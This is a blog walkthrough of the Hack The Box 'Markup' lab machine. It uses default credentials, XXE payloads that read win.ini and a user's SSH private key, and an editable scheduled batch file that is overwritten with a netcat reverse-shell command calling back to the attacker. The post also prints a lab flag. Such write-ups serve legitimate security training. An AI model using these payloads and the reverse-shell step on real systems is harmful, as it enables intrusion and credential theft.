The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks


Markup: Use XXE Injection and privilege escalation to get the flag

posted on 12.6.2023 by Below Surface in "Hack The Box"

Port scan first, replacing ip with the target machine's IP address:

sudo nmap -sV ip

Relevant output:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)

Navigate to the website on port 80 by pasting the machine's IP address into your browser. Try a couple of default username:password combinations. These work:

Username: admin
Password: password

The order page is of special interest because it has input fields. Let's fire up Burp Suite to see how the underlying application handles them.

burpsuite

In your browser, enable the proxy in Settings/Proxy with IP 127.0.0.1 and port 8080, and also enable the HTTPS proxy option below it. Then in Burp Suite, open the Proxy tab and turn interception on, so the button reads "Intercept is on".

Burp Suite should now catch every request from the browser, and you need to click "Forward" to let each one through. Test this by submitting some data, e.g.

Quantity: 12
Address: 12

This data is sent in the body of the intercepted request as XML:

<?xml version = "1.0"?><order><quantity>12</quantity><item>Home Appliances</item><address>12</address></order>

Since the server accepts raw XML from the client, we will try XML External Entity (XXE) injection. The linked resource (book.hacktricks.xyz) gives this basic payload; its example reads /etc/passwd on Linux, so we adapt the file path for Windows below:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

Let's send another POST request via the form, catch it with Burp Suite and pass it to the Repeater by pressing

Ctrl + R

Then we go to the Repeater tab, where we edit the request body to:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order><quantity>12</quantity><item>&test;</item><address>12</address></order>

Relevant output:

Your order for ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[Ports]
COM1:=9600,n,8,1
 has been processed

This is the content of the win.ini file, so the target is vulnerable to XML External Entity (XXE) injection: the parser resolves the SYSTEM entity and echoes the file back in place of the <item> element.

Instead of brute forcing usernames to find files and folders of interest, we inspect the page source of the website (right click, View Page Source). We are lucky: there is an HTML comment "Modified by Daniel ...", so Daniel is the username we will try next.

In the repeater tab, modify the request to include:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order><quantity>12</quantity><item>&test;</item><address>12</address></order>

Relevant output:

Your order for -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwA..........

Now copy the full private key (from the BEGIN line to the END line) and put it into a local file called id_rsa. sudo is not needed for this; creating the file as your normal user avoids ending up with a root-owned key that only root can read:

mkdir temp
cd temp
nano id_rsa
ctrl + shift + v // to paste
ctrl + o // to save
enter // to confirm
ctrl + x // to close

The file content should look like this:

-----BEGIN OPENSSH PRIVATE KEY-----
key...
-----END OPENSSH PRIVATE KEY-----

Then restrict the file permissions, otherwise ssh refuses to use the key ("UNPROTECTED PRIVATE KEY FILE"):

chmod 400 id_rsa

Then we SSH into the target as daniel with his private key:

ssh -i id_rsa daniel@ip

This should succeed! Now change into the Desktop folder and output the user flag:

cd Desktop
type user.txt
032d2fc8952a8c24e39c8f0ee9918ef7

Now it's time for privilege escalation!

whoami /priv

Will output:

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Neither of these privileges helps us escalate. Let's explore the file system instead:

cd C:\
cd Log-Management
type job.bat

We see that the script calls wevtutil.exe to perform several tasks on the system, but it can only be run by an Administrator. Let's check whether we can at least edit the file:

icacls job.bat

The BUILTIN\Users group, which Daniel is a member of, has full control (F) over the file. So if this script is executed by a privileged account, we can get a shell: transfer Netcat to the target and modify job.bat so that it launches a reverse shell.
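
The same check applied to a whole directory listing, as an added example that is not from the original post: parse the icacls output with Python and report every file that a low-privilege group can modify. The SAMPLE listing is constructed in icacls' format for this example; its job.bat entry mirrors the BUILTIN\Users:(F) ACE described above.

```python
"""Added example (not from the original post): parse icacls output and report
files that a low-privilege principal may modify, which is the check that
makes job.bat interesting.  SAMPLE below is constructed in icacls' output
format for this example; run `icacls C:\\Log-Management\\*` on the target
to get the real listing.
"""
import re
from typing import Dict, List, Set, Tuple

# Simple and specific rights that allow changing or replacing file contents.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC"}

# Principals that every ordinary user (such as daniel) falls under.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output: str) -> Dict[str, List[Tuple[str, Set[str]]]]:
    """Map each listed file to its ACEs as (principal, set of flags).

    icacls prints the first ACE on the same line as the path and the rest
    indented on the following lines.  Inheritance markers such as (I), (OI)
    or (CI) stay in the flag set; they are not rights and never match
    WRITE_RIGHTS.  Paths containing spaces are not handled by this parser.
    """
    files: Dict[str, List[Tuple[str, Set[str]]]] = {}
    current = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if raw[0] != " ":  # new file: "<path> <principal>:(flags)"
            current, _, ace = line.partition(" ")
            files[current] = []
        else:
            ace = line
        m = ACE_RE.match(ace)
        if m and current is not None:
            flags = set(re.findall(r"\(([^)]*)\)", m.group("flags")))
            files[current].append((m.group("who"), flags))
    return files


def writable_by_low_priv(output: str) -> Dict[str, List[str]]:
    """Return {file: [principals]} for ACEs granting write rights to a low-priv group."""
    hits: Dict[str, List[str]] = {}
    for path, aces in parse_icacls(output).items():
        for who, flags in aces:
            if who in LOW_PRIV_PRINCIPALS and flags & WRITE_RIGHTS:
                hits.setdefault(path, []).append(who)
    return hits


# Constructed sample; the job.bat line mirrors the ACE the post describes.
SAMPLE = """\
job.bat BUILTIN\\Users:(F)
        NT AUTHORITY\\SYSTEM:(I)(F)
        BUILTIN\\Administrators:(I)(F)
nc64.exe NT AUTHORITY\\SYSTEM:(I)(F)
         BUILTIN\\Administrators:(I)(F)
         BUILTIN\\Users:(I)(RX)

Successfully processed 2 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, principals in writable_by_low_priv(SAMPLE).items():
        print("%s is writable by %s" % (path, ", ".join(principals)))
```

On the target, `icacls C:\Log-Management\* > acl.txt` produces input in this format; `whoami /groups` confirms which of the listed principals your current user actually belongs to, since the script only matches on principal names.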

First we check whether the script is run as a scheduled task:

schtasks

This fails for our unprivileged user, but the process list in PowerShell tells us the same thing:

powershell
ps

Relevant output:

4    2   416     80       1468  1 wevtutil

wevtutil is running, so job.bat is being executed regularly by another account, and since the script only works for an Administrator, that account is privileged. This is the misconfiguration we exploit: a script run by an Administrator that any user can edit.

Now we transfer the Netcat binary nc64.exe from our local machine to the target. Download it from here:

https://github.com/int0x33/nc.exe/blob/master/nc64.exe

Then change into the directory containing the downloaded file and start a simple Python HTTP server (port 80 needs root, hence sudo):

cd Downloads
sudo python3 -m http.server 80

Expected output:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Keep this terminal window open and go back to the PowerShell session on the target. There, download nc64.exe, replacing ip with your tun0 IP address (in PowerShell, wget is an alias for Invoke-WebRequest):

wget http://ip/nc64.exe -OutFile nc64.exe
dir // check that the file was downloaded successfully

Expected output:

Mode        LastWriteTime     Length Name
----        -------------     ------ ----
-a----     3/6/2020  1:42 AM      346 job.bat
-a----    6/13/2023 12:57 AM     45272 nc64.exe

Then exit PowerShell and modify job.bat from the plain cmd prompt (daniel@MARKUP). This matters: the > redirection in Windows PowerShell writes the file as UTF-16 with a byte order mark, which cmd will not execute as a batch script, whereas echo in cmd writes plain ASCII.

But first, start a local Netcat listener in a new terminal window:

sudo nc -lvnp 443

Then overwrite the file (make sure to fill in your tun0 IP address; the > redirection replaces the whole script, so the original job.bat contents are gone):

echo C:\Log-Management\nc64.exe -e cmd.exe ip 443 > C:\Log-Management\job.bat

When the script is next executed, the Netcat listener should output something like:

connect to [10.10.15.4] from (UNKNOWN) [10.129.47.70] 49684
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

Now, in the Netcat terminal, run this command to output the admin flag:

type C:\Users\Administrator\Desktop\root.txt

Tags:

hack the box
xxe injection
ssh
default credentials
arbitrary file upload
python http server
powershell
privilege escalation

Sources:

https://app.hackthebox.com/starting-point
https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
https://github.com/int0x33/nc.exe/blob/master/nc64.exe
